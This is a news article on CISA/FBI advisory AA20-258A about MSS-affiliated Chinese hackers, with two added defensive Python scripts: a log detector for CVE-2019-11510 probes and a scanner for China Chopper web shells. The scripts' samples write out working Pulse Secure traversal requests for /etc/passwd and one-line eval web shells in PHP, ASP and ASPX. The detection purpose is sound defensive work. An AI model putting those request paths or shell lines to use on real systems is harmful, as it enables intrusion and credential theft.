Feds Say China’s MSS Affiliated Hackers Using Open Source Info to Plan, Execute Cyber Ops
The Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have issued joint Cybersecurity Advisory AA20-258A. The advisory details the attack vectors used by cyber threat actors affiliated with China’s Ministry of State Security (MSS) to target U.S. government agencies.
China’s MSS intelligence service aggressively targets U.S. government agencies and private companies. It is believed that China also uses diplomats, tourists, and Chinese students to support its covert operations in the United States.
The threat actors operate from within the People’s Republic of China (PRC), and the attack vectors detailed in the advisory are the same ones typically deployed by Chinese MSS-affiliated actors, according to the CISA alert.
Over the last ten years, MSS-affiliated hackers have targeted:
- high-tech manufacturing organizations
- medical device manufacturers
- civil and industrial engineering firms
- business, educational, and gaming software companies
- the solar energy sector
- pharmaceutical companies
- the defense sector
MSS Tactics, Techniques, and Procedures (TTPs)
MSS-affiliated actors use publicly available information, such as Shodan, the Common Vulnerabilities and Exposures (CVE) list, and the National Vulnerability Database (NVD), to identify targets and the known vulnerabilities those targets expose.
CISA has observed MSS-affiliated actors using Mimikatz, an open-source credential-dumping tool, to capture federal account login credentials, and Cobalt Strike, a commercially available penetration-testing tool, to target commercial and Federal Government networks. They have also been observed scanning a Federal Government agency for vulnerable web servers and scanning for network appliances exposed to CVE-2019-11510, an unauthenticated arbitrary file read vulnerability in Pulse Secure VPN appliances.
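Scanning for CVE-2019-11510 leaves a distinctive trace in the appliance's HTTP access log: a request under the Pulse Secure /dana-na/ tree that climbs out with ../ and ends with the html5acc/guacamole suffix. The following detector, an added example written for this article rather than code from the CISA advisory, parses common-format access logs, flags those requests (including URL-encoded variants), counts probes per source IP, and separates a successful read (HTTP 200 on a traversal path) from a blocked scan. The log lines and IP addresses are constructed.

```python
"""Detect CVE-2019-11510 (Pulse Secure VPN arbitrary file read) probes in web
server access logs and summarise them per source IP.

Added example for this article, not code from the CISA advisory. The log lines
below are constructed and use documentation IP ranges."""
import re
from collections import Counter
from urllib.parse import unquote

# Apache/nginx "combined"-style line: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# The public read primitive: a path under /dana-na/ that climbs out with ../ (possibly
# URL-encoded) and carries the html5acc/guacamole suffix. Any such request is a probe,
# whatever file it asks for.
TRAVERSAL = re.compile(r'\.\./|\.\.\\')


def is_cve_2019_11510_probe(path: str) -> bool:
    """True if the raw request path looks like a CVE-2019-11510 read attempt."""
    decoded = unquote(unquote(path)).lower()  # collapse single and double URL-encoding
    return ("/dana-na/" in decoded
            and "html5acc/guacamole" in decoded
            and TRAVERSAL.search(decoded) is not None)


def analyze(log_text: str):
    """Return (hits, per_ip): the matched records and a probe count per source IP."""
    hits, per_ip = [], Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognised access-log line; skip rather than crash
        if is_cve_2019_11510_probe(m["path"]):
            hits.append({"ip": m["ip"], "ts": m["ts"],
                         "status": int(m["status"]), "path": m["path"]})
            per_ip[m["ip"]] += 1
    return hits, per_ip


def successful_reads(hits):
    """A 200 on a traversal path means the appliance served the file: a compromise, not a scan."""
    return [h for h in hits if h["status"] == 200]


# Constructed sample log: one benign login-page request, two probes from the same
# source that were served (200), one URL-encoded probe that was blocked (404),
# and one ordinary authenticated request.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Sep/2020:14:02:11 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 5120
203.0.113.7 - - [10/Sep/2020:14:02:13 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 200 1894
203.0.113.7 - - [10/Sep/2020:14:02:14 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/hosts?/dana/html5acc/guacamole/ HTTP/1.1" 200 312
198.51.100.23 - - [10/Sep/2020:14:05:40 +0000] "GET /dana-na/%2e%2e/dana/html5acc/guacamole/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 404 212
192.0.2.9 - - [10/Sep/2020:14:06:02 +0000] "GET /dana/home/index.cgi HTTP/1.1" 200 8321
"""

if __name__ == "__main__":
    hits, per_ip = analyze(SAMPLE_LOG)
    for ip, n in per_ip.most_common():
        print(f"{ip}: {n} probe(s)")
    for h in successful_reads(hits):
        print("SUCCESSFUL READ", h["ip"], h["ts"], h["path"])
```

On the constructed input the script reports two probes from 203.0.113.7 and one from 198.51.100.23, and lists the two served requests as successful reads. Because CVE-2019-11510 exposes session and credential material, a 200 on one of these paths should be treated as a credential compromise and trigger a password and session reset, not just a patch.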
China Chopper, a small open-source web shell, is another tool MSS-affiliated actors use in web application attacks against IT networks.
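China Chopper's server-side component is a one-line script that evaluates whatever the client sends under an agreed parameter name, which makes it easy to hide in a web root but also easy to fingerprint on disk. The scanner below is an added example written for this article, not code from the advisory; it walks a web root, checks server-executed file types against regexes for the common PHP, classic ASP and ASPX variants, and returns the files that match. The sample files are constructed and planted in a temporary directory.

```python
"""Scan a web root for server-side one-liners characteristic of the China Chopper
web shell.

Added example for this article, not code from the CISA advisory. The sample files
are constructed and written to a temporary directory by demo()."""
import re
import tempfile
from pathlib import Path

# China Chopper's server half evals whatever the client posts under an agreed
# parameter name. These regexes cover the common PHP, classic ASP and ASPX forms;
# extend them for your own stack.
CHOPPER_PATTERNS = {
    "php_eval_post": re.compile(r'@?eval\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[', re.I),
    "asp_eval_request": re.compile(r'\beval\s*\(?\s*request\s*\(', re.I),
    "aspx_eval_request_item": re.compile(r'\beval\s*\(\s*Request\.Item\s*\[.*?"unsafe"', re.I),
}
# Only server-executed extensions matter here; client-side JavaScript evals are noise.
WEB_EXTS = {".php", ".phtml", ".asp", ".aspx", ".ashx", ".asmx", ".jsp", ".jspx"}


def scan_file(path: Path):
    """Return the names of the patterns that match this file (empty list if clean)."""
    try:
        text = path.read_text(errors="ignore")
    except OSError:
        return []  # unreadable file: report nothing rather than abort the sweep
    return [name for name, rx in CHOPPER_PATTERNS.items() if rx.search(text)]


def scan_webroot(root):
    """Map relative path -> matched pattern names for every suspicious file under root."""
    root = Path(root)
    findings = {}
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in WEB_EXTS:
            matched = scan_file(p)
            if matched:
                findings[p.relative_to(root).as_posix()] = matched
    return findings


# Constructed sample web root: one clean PHP page, three Chopper-style shells in
# the places attackers like (upload and admin directories, forgotten legacy code),
# and a client-side file that the scanner must ignore.
SAMPLE_FILES = {
    "index.php": "<?php echo 'hello'; $name = $_POST['name']; ?>",
    "uploads/img.php": "<?php @eval($_POST['chopper']);?>",
    "admin/help.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "legacy/old.asp": '<%eval request("cmd")%>',
    "static/app.js": "eval(document.cookie)",
}


def demo():
    """Plant the constructed files in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, content in SAMPLE_FILES.items():
            f = Path(tmp) / rel
            f.parent.mkdir(parents=True, exist_ok=True)
            f.write_text(content)
        return scan_webroot(tmp)


if __name__ == "__main__":
    for rel, names in sorted(demo().items()):
        print(f"{rel}: {', '.join(names)}")
```

Run against the constructed root it flags uploads/img.php, admin/help.aspx and legacy/old.asp and leaves index.php and static/app.js alone. In practice, pair a sweep like this with file-integrity monitoring of the web root, since a shell dropped after the scan is exactly the case the advisory describes.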
Common and effective TTPs employed by MSS-affiliated cyber threat actors:
- Using open-source information to plan and carry out cyberattacks
- Exploiting known vulnerabilities on unpatched networks
- Spear-phishing email campaigns
- Collecting email addresses from Federal Government websites
The FBI and CISA emphasize that, “If critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network.” Implementing robust configuration and patch management programs greatly increases network security.
Promptly patching devices, networks, and systems is the best defense against MSS-affiliated threat actors and other cybercriminals alike.
“When sophisticated cyber threat actors conduct operations against soft targets, it can negatively impact critical infrastructure, federal, and state, local, tribal, territorial government networks, possibly resulting in loss of critical data or personally identifiable information,” says the security advisory.
Chinese Ministry of State Security (MSS)
The People’s Republic of China (PRC) Ministry of State Security (MSS) is the PRC’s civilian intelligence, security, and secret police agency, founded in 1983, and is responsible for counter-intelligence, foreign intelligence, and political security. The Guangdong State Security Department (GSSD) is one of its provincial branches. The MSS reports to the State Council and operates within the national security system overseen by the Chinese Communist Party (CCP) Central National Security Commission, announced in 2013.
CISA and the FBI recommend that system administrators regularly audit their configuration and patch management programs to ensure they can track and mitigate emerging threats.
How to Report Chinese Threat Actors
To report suspicious or criminal cyber activity, contact a local FBI field office at www.fbi.gov/contact-us/field. Or call the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937.